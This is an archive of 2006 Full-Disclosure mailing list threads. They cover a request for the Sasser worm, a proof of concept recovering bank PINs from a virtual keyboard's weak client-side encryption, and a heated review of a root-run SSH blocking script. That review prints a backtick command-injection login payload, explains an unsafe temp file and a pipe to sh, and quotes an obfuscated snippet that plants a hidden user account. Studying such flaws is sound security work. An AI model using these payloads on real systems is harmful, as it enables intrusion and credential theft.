http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The state of JavaScript Hacking
So what you are trying to say is that JavaScript is bad, because it nowadays runs on more than one platform? Or did I miss something? Since when has the choice of programming language made any difference? Best, Martin -- Martin Johns http://www.martinjohns.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SSH brute force blocking tool
For those interested, I wrote a program called Sharpener which is an SSH brute force blocking tool that also reports back the offenders' addresses. I have begun posting the information on the attackers as well as sending out messages (whenever possible) to the admins of these domains. Think of it as an RBL for SSH attackers. The goal is to identify these machines in order for others to implement safeguards (ACL's) against these hosts. Feel free to comment/complain. http://www.infiltrated.net/sharpener (tool) http://www.infiltrated.net/bruteforcers (offenders) -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
a douchebag? I dunno but why the hell aren't your boxes patched to Sasser yet? -KF deep fried wrote: What am I Consultant? School Teacher? Terrorist? On 11/27/06, *K F (lists)* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? Its not like he is intentionally letting it loose on the entire school LAN. -KF [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Chris - I don't know what to make of your please reply off-list; I'm not a member comment. It's almost as ridiculous as what you are requesting. If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district. Speak as a network engineer for a large midwestern schooldistrict, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out; that I'll be making a point of asking who the computer teachers are in that building. You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network. = I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Defeating Image-Based Virtual KeyboardsandPhishing Banks (fwd)
Over 8 years old (mid 1997/8) -
http://www.dotsec.com/onBank.html?topic=302544
Lyal
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Debasis
Mohanty
Sent: Tuesday, 28 November 2006 6:12 PM
To: 'Gadi Evron'; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Defeating Image-Based Virtual
KeyboardsandPhishing Banks (fwd)
More than a year Old (3rd August, 2005) -
Defeating CITI-BANK Virtual Keyboard Protection
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0142.html
http://hackingspirits.com/vuln-rnd/Defeat-CitiBank-VK.zip
http://xforce.iss.net/xforce/xfdb/21727
Regards,
-d
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron
Sent: Sunday, November 26, 2006 12:18 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Defeating Image-Based Virtual Keyboards
andPhishing Banks (fwd)
Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following up a
post by HispaSec. This is about breaking virtual keyboards implementations,
and the encryption some of them use (most of them send the data in clear
text with the image). HispaSec was a reference by which we found the banks'
site as one using a virtual keyboard.
http://blogs.securiteam.com/index.php/archives/678
http://hispasec.com/laboratorio/cajamurcia_en.htm
Gadi.
Quoting:
Recently, I stumbled upon a post by HispaSec showing off a screen shot
trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which nicely
showed how a trojan horse can, utilizing a key stroke capture and screenshot
capture, grab a user's PIN number, fairly easily, and wondered why are they
taking this approach when the PIN numbers can be easily retrieved by
sniffing the data sent by the user to the banking site, even though they are
encrypted.
Image based keyboard (or virtual keyboards) were invented to make life
harder for banking or phishing trojan horses (specifically key-stroke
loggers or key loggers), some even suggested they be used specifically to
avoid these trojan horses. The bad guys adapted to this technology and
escalated. Now the trojan horses take screenshots of where the mouse pointer
is to determine what number they clicked on. Thing is, it is often
unnecessary as in most implementations of this technique that we looked into
(meaning, not all) it was flawed.
Instead of sending the remote image and waiting for the key-stroke
information to be sent back to the server (the technique which the
screenshots for pointer location on-click described above was used) some
banks send the PIN number in cleartext, while others encrypt them, one such
example is cajamurcia. Even when the encryption is used, banks tend to
implement it badly making it easy to recover the PIN number from the
encrypted form.
I investigated a bit more on how cajamurcia handles such PIN strokes (with
virtual keyboards) and I noticed something strange, they take the timestamp
of their server (cajamurcia) and send it to you - this already posses a
security problem - and this timestamp is then used to encrypt the PIN number
you entered.
This would have been a good idea if the timestamp was not sent back to the
server, making it hard or semi-hard to guess the timestamp used to encrypt
the data, but at the same time making it harder for the server to know what
timestamp was provided to the client (unless they store it inside their
session information). Anyhow, as it is sent back to the server, we have
everything we need to decrypt the data (PIN number).
PoC:
A request to the server would look like:
OPERACION=0002 CAJA=2043 CAMINO=2043 PGDESTI=CORP BROKER=SI VRS=001
PAN=2043123456 SELLO=16100616012569 CL=1161006956 PINV3=si
PANA=2043 PANB=123456 PIN=BBCB6E341C56C6B2 IDIOMA=01
We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL being
the timestamp and PIN being the encrypted form of the PIN number. If we feed
these into the following JS code:
https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js
function hexToString (h) {
var r = ;
for (var i= (h.substr(0, 2)==0x)?2:0; i lowerthan h.length; i+=2) { r +=
String.fromCharCode (parseInt (h.substr (i, 2), 16)); } return r; } calcula
= '1161006956'; ciphertext = hexToString('0xBBCB6E341C56C6B2');
var cleartext = des (calcula.substr(2,8), ciphertext, 0, 1, );
console.debug(cleartext);
We will get our original PIN number. This isn't necessarily easier as it
requires data capture, which isn't always easy, but screen captures usually
require either an OCR, or manual labor, which the above code does not.
One needs to remember that Javascript (or any client-side code and
information) is indeed on the client's side and under the client's control.
An attacker can kick it aside, or learn to emulate it and attack it -
manipulate it. Client-side encryption where the code and key are visible is
pointless. No matter how much obfuscation or cross-frame and cross-file
scripting is
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 02:22:10PM -0500, J. Oquendo wrote: For those interested, I wrote a program called Sharpener which is an SSH brute force blocking tool that also reports back the offenders' addresses. I have begun posting the information on the attackers as well as sending out messages (whenever possible) to the admins of these domains. Think of it as an RBL for SSH attackers. The goal is to identify these machines in order for others to implement safeguards (ACL's) against these hosts. Feel free to comment/complain. http://www.infiltrated.net/sharpener (tool) http://www.infiltrated.net/bruteforcers (offenders) Nice work, really subtle rootkit. I like the email phone-home. Here's an exploit. #!/bin/sh ssh 'foo bar `/sbin/halt`'@victim -- - [EMAIL PROTECTED] | finger me for my pgp key. --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006 13:36:39 EST, K F (lists) said: Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? Its not like he is intentionally letting it loose on the entire school LAN. You would have us believe that the guy is clued enough to run a closed lab without screwing up (and there's *lots* of ways to screw up, starting with forgetting to wipe the drives afterwards, forgetting to disable a wireless card, forgetting to not plug any of the boxes into the normal net, forgetting to...). And yet he's not clued enough to know how to find a copy of Sasser by himself. There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy. pgpw76PA4Q4Wi.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
Nice work, really subtle rootkit. I like the email phone-home.
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
if [ `whoami` != root ]
then echo This script needs to run under the root user
exit
else
if [ -e /tmp/hosts.deny ]
then
rm /tmp/hosts.deny
fi
/
Check to see if the user is root. If not, tell the user Hey dumbass, you
need to be root, if the user is root, continue.
/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
/tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ //{print $2}'
/etc/hosts.deny
/
There is no hocus pocus here. Look at /var/log/secure and fine the term
error retrieving and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
/etc/hosts.deny
into /etc/hosts.deny
/
OS=$( uname|sed -n '1p')
/
This is a no brainer. No voodoo there.
# IPTables function...
ifaddr=`ifconfig -a|awk '/inet/ !/inet6/ !/127.0/
!/192.168/{print $2}'|sed 's/addr\://g'`
Do an ifconfig on the machine. Ignore the word inet, inet6, 127.0,
192.168, print
the second field, and replace the term addr: with nothing. No voodoo
here jackass.
/
function IPT {
awk '!/#/ /\./ !a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT}' /etc/hosts.deny |\
awk '/iptables/ !/#/ !/-s -i/'|sh
}
/
This is such a hacker thing coming now. You caught me.
Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk
hacking)
/
if [ $OS = Linux ]
then
IPT
fi
/
This is where I guess I hack the world. Check the OS and if it's Linux,
then
cat /etc/hosts.deny
Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk
hacking)
then print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport
22 -j REJECT
$1 = IP address
$ifaddr = IP address of the interface
/
echo Copying sharpener to /usr/local/bin
sed -n '1,67p' ./sharpener /usr/local/bin/sharpener
echo fi /usr/local/bin/sharpener
rm ./sharpener
/
Here goes the voodoo... You ready?
print lines from 1 through 67 of this same file but put it in
/usr/local/sharpener
add a fi to that same file then remove the original
/
sleep 2
echo
echo Adding Sharpener to cron
echo 0,10,20,30,40,50 * * * * /usr/local/bin/sharpener
if [ -e /var/spool/cron/root ]
then
echo 0,10,20,30,40,50 * * * *
/usr/local/bin/sharpener /var/spool/cron/root
else
if [ -e /var/cron/tabs/root ]
then
echo 0,10,20,30,40,50 * * * * /usr/local/bin/sharpener
/var/cron/tabs/root
fi
fi
/
Add it to cron
/
awk '!/192.168/
!/127./
!/#/
!/172.32/{print $1 has been blocked via SSH}' /etc/hosts.deny |\
mail -s Sharpener [EMAIL PROTECTED]
fi
/
Print out the first column of /etc/hosts.deny ... Ignore 127., ignore #,
and ignore 172.32
then mail it to an evil hacker site so they can traverse telekinetically
into your machine.
Right.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:
Nice work, really subtle rootkit. I like the email phone-home.
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
/tmp/hosts.deny
insecure temporary file creation, race condition if a user can create
that file between the unlink and the open.
$ ssh error retrieving@localhost ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`
Oops.
Thanks, Tavis.
--
-
[EMAIL PROTECTED] | finger me for my pgp key.
---
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
On 11/27/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: And yet he's not clued enough to know how to find a copy of Sasser by himself. There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy. yeah I agree, whoever posted/ started this orginal thread was on gmail and is not clued in enough to take a quick left glance at the adsense frame and s/eh will get tonnes of bait from google :)- go figure.. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
Uh... actually, no. The provided exploit Will work, and you're the
idiot.
Here, let me show you.
You do this:
/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
/tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ //{print $2}'
/etc/hosts.deny
/
There is no hocus pocus here. Look at /var/log/secure and fine the term
error retrieving and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
/etc/hosts.deny
into /etc/hosts.deny
What will be in column 13 when Tavis does this:
Tavis Ormandy wrote:
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Why, the shelled-out output of `/sbin/halt`!
Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.
Kids, don't use this script. Please.
--
gabriel rosenkoetter
[EMAIL PROTECTED]
pgpfX9tuMYBhq.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:
Nice work, really subtle rootkit. I like the email phone-home.
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
/tmp/hosts.deny
insecure temporary file creation, race condition if a user can create
that file between the unlink and the open.
$ ssh error retrieving@localhost ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`
Oops.
Thanks, Tavis.
So again dumbass...
Look at the script. Although YOU'RE opening /var/log/authlog what is the
script opening. Please tell me you're really not that stupid. And if
someone else decided to modify this script, what does that have to do
with what I posted. How exactly is my script a backdoor as you claim.
Enquiring minds want to know this since you claim its a backdoor. Please
tell me outside of your modification how this is going to backdoor someone.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote:
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
Uh... actually, no. The provided exploit Will work, and you're the
idiot.
Here, let me show you.
You do this:
/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
/tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ //{print $2}'
/etc/hosts.deny
/
There is no hocus pocus here. Look at /var/log/secure and fine the term
error retrieving and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
/etc/hosts.deny
into /etc/hosts.deny
What will be in column 13 when Tavis does this:
Tavis Ormandy wrote:
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Why, the shelled-out output of `/sbin/halt`!
Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.
Kids, don't use this script. Please.
Jesus christ people get stupider by the moment. W/e the script is there
for scrutiny there is no hidden voodoo. If you DO want to see hidden
voodoo here it is,,,
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote:
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
Uh... actually, no. The provided exploit Will work, and you're the
idiot.
Here, let me show you.
You do this:
/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
/tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ //{print $2}'
/etc/hosts.deny
/
There is no hocus pocus here. Look at /var/log/secure and fine the term
error retrieving and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in
/etc/hosts.deny
into /etc/hosts.deny
What will be in column 13 when Tavis does this:
Tavis Ormandy wrote:
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Why, the shelled-out output of `/sbin/halt`!
Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.
Kids, don't use this script. Please.
Here is your voodoo backdoor moron
file=`awk 'NR==59 {gsub(//,);print $3}' /usr/include/paths.h`
sed -n '1p' $file|awk -F :
'BEGIN{OFS=:}{$1=test}1{$2=\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1}2'
$file
file2=`awk 'NR==74 {gsub(/,/,);print $8}' /usr/include/sysexits.h`
sed -n '1p' $file2|sed 's/[^:]*:/test:/' $file2
who=`sed -n '58p' sysexits.h |awk '{print $5}'`
what=`sed -n '60p' wireless.h |awk 'gsub(/,/, ){print $4}'`
when=` sed -n '60p' wireless.h |awk 'gsub(/,/, //){print $4}'`
$what|$who full-disclosure@lists.grok.org.uk
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On 11/27/06, J. Oquendo [EMAIL PROTECTED] wrote: There is no hocus pocus here. Look at /var/log/secure and fine the term error retrieving and print the next line, 13th column. Then sort it and print the unique entries into /tmp/hosts.deny. After you do this, compare /tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny into /etc/hosts.deny Parsing malicious input with shell commands is like disarming land mines with a hammer. And doing it as root? That's like disarming land mines with a hammer while you're stark naked. Regards, Brian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 03:59:37PM -0500, gabriel rosenkoetter wrote:
Uh... actually, no. The provided exploit Will work, and you're the
idiot.
Begging your pardon, you are saved by single-quoting your awk(1)
statement:
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru
/tmp/hosts.deny
[...]
What will be in column 13 when Tavis does this:
Tavis Ormandy wrote:
ssh 'foo bar `/sbin/halt`'@victim
[...]
Why, the shelled-out output of `/sbin/halt`!
Nope, I'm wrong, just the literal string `/sbin/halt`, which you
never exec.
Mea culpa. Tavis's exploit doesn't so scary things, although he's
right you should really be doing a bit more sanitization of (evil)
user-supplied input, given that you're (insisting that you) run as
root.
On Mon, Nov 27, 2006 at 04:12:11PM -0500, J. Oquendo wrote:
Look at the script. Although YOU'RE opening /var/log/authlog what is the
script opening. Please tell me you're really not that stupid.
Actually, your BSD version DOES open /var/log/authlog (which will
fail on FreeBSD, btw, where it's /var/log/auth.log), so you should
probably stop casting stones and quit while you're ahead with my
explanation above of why Tavis's exploit is a non-starter.
But since we're on the topic... wouldn't it be a better plan to
check the local syslog.conf for the location of the auth failure
log messages rather than hard code it?
--
gabriel rosenkoetter
[EMAIL PROTECTED]
pgp9aDaZQPXuz.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:12:11PM -0500, J. Oquendo wrote: So again dumbass... Look at the script. Although YOU'RE opening /var/log/authlog what is the script opening. I'm opening authlog as I dont use secure, the same thing applies. Please tell me you're really not that stupid. And if someone else decided to modify this script, what does that have to do with what I posted. How exactly is my script a backdoor as you claim. It's a backdoor because your script doesnt account for out-of-order log entries, usernames or other data containing spaces thus making your field count incorrect, or other daemons using the string `error retrieving` in their log entries. The insecure temporary file creation allows a local user to add entries to the passwd file (for example), or create or modify any file as root. Although it doesnt directly allow them to control the data the fileis created with, combined with the other flaw this is possible. Even without the other flaw, the existence of some files is a problem, such as /etc/.nologin. the test -e and rm is insufficient, firstly as it's a race condition, and secondly as test -e will return 1 on broken (sometimes called dangling) symlinks. Enquiring minds want to know this since you claim its a backdoor. Please tell me outside of your modification how this is going to backdoor someone. I'm not sure what you mean by modification, I simply subsituted the name for the logfile I use. Thanks, Tavis. -- - [EMAIL PROTECTED] | finger me for my pgp key. --- pgpvmB2Xh1ofl.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
I'm not sure what you mean by modification, I simply subsituted the name
for the logfile I use.
Thanks, Tavis.
So for the third time now. Explain to me how I am backdooring someone's
system.
[EMAIL PROTECTED] include]# uname -a
Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686
i686 i386 GNU/Linux
[EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}'
/var/log/secure|sort -ru
222.171.20.252
211.137.74.58
My logs parse out addresses not named and there is no redirection going
on. If you want to say Hey... It should be written as such then gladly
do so. But posting hey you're backdooring the planet like a jackass is
moronic. Line by line on my machines it does what it needs to do and it
does so just fine. Did you see any notes of Gentoo on the comments? I
didn't because I don't use it, never have, don't care to. So if it does
something different on Gentoo, let's use the brain for a moment... Gee
this works horrible on Gentoo. The author is a shitty writer... I think
I should let him know as opposed to Oh my gawd he's backdooring you.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote:
Mea culpa. Tavis's exploit doesn't so scary things, although he's
right you should really be doing a bit more sanitization of (evil)
user-supplied input, given that you're (insisting that you) run as
root.
Gabriel, I was referring to this line:
awk '!/#/ /\./ !a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT}' /etc/hosts.deny |\
awk '/iptables/ !/#/ !/-s -i/'|sh
(note the |sh), $1 can be controlled by specially crafted attempted
logins.
Thanks, Tavis.
--
-
[EMAIL PROTECTED] | finger me for my pgp key.
---
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 09:29:33PM +, Tavis Ormandy wrote:
Gabriel, I was referring to this line:
awk '!/#/ /\./ !a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT}' /etc/hosts.deny |\
awk '/iptables/ !/#/ !/-s -i/'|sh
(note the |sh), $1 can be controlled by specially crafted attempted
logins.
Aha.
Yep, sure can!
I couldn't find where the malicious input was actually executed, but
I didn't spend long looking.
I take back my take back.
--
gabriel rosenkoetter
[EMAIL PROTECTED]
pgpZhqVSn11PF.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
why not save all that trouble and just use the --limit directive in iptables? (examples on the netfilter mailing-list). ~Mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:27:24PM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:
I'm not sure what you mean by modification, I simply subsituted the name
for the logfile I use.
Thanks, Tavis.
So for the third time now. Explain to me how I am backdooring someone's
system.
J, Please calm down. You have made a programming error in your script
that attempts to eliminate the minor `log noise` from incorrect ssh
logins with a script that can be subverted to execute arbitrary shell
commands.
[EMAIL PROTECTED] include]# uname -a
Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686
i686 i386 GNU/Linux
[EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}'
/var/log/secure|sort -ru
222.171.20.252
211.137.74.58
My logs parse out addresses not named and there is no redirection going
on.
Yes, but you assume a fixed format of the log entries. This is not the
case. The string error retrieving is easily placed in the log by
setting it as your username and attempting to login. You also assume
that the multiple log entries generated by a failed login are logged
atomically (ie, no other log entries will appear between these two
entries), this is also not the case.
If you want to say Hey... It should be written as such then gladly
do so. But posting hey you're backdooring the planet like a jackass is
moronic.
J, you asked people to install your security tool which contacts you
with enough information to find out who installed it and where, and
contains several rather obvious security flaws. If I mistook stupidity
for malice, I apologise.
Line by line on my machines it does what it needs to do and it
does so just fine.
This is because your logs dont contain any entries specially crafted by
an attacker to subvert your machine. I'm sure some members of the list
are already attempting this on your web server, so you can check your
logs for examples.
Did you see any notes of Gentoo on the comments? I
didn't because I don't use it, never have, don't care to. So if it does
something different on Gentoo, let's use the brain for a moment... Gee
this works horrible on Gentoo. The author is a shitty writer... I think
I should let him know as opposed to Oh my gawd he's backdooring you.
It's a standard format J, my log entries look identical to yours. It has
nothing to do with Gentoo.
Thanks, Tavis.
--
-
[EMAIL PROTECTED] | finger me for my pgp key.
---
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:27:24PM -0500, J. Oquendo wrote:
So for the third time now. Explain to me how I am backdooring someone's
system.
[EMAIL PROTECTED] include]# uname -a
